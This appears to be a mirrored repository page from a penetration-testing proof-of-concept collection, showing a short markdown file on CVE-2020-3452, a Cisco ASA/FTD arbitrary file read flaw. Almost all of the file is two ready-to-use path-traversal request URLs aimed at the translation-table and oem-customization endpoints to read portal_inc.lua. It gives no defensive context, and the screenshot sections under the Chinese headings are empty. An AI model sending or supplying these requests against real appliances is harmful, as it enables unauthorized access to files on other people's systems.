Mirrors_BOOKS/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2026-05-07 21:12:34 +08:00
Code Issues Actions 9 Packages Projects Releases Wiki Activity
Files
master
Penetration_Testing_POC/web/CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md
T
copilot-swe-agent[bot] 7f075b99f4 reorganize: create iot/, web/, privesc/, pc/ dirs and move loose md files 
Co-authored-by: Mr-xn <18260135+Mr-xn@users.noreply.github.com>
2026-03-06 13:16:28 +00:00

485 B
Raw Permalink Blame History

CVE-2020-3452Cisco_ASAFTD任意文件读取漏洞

POC1️⃣

For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

漏洞复现情况如下:

POC2️⃣

https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

漏洞复现情况如下:

Reference in New Issue View Git Blame Copy Permalink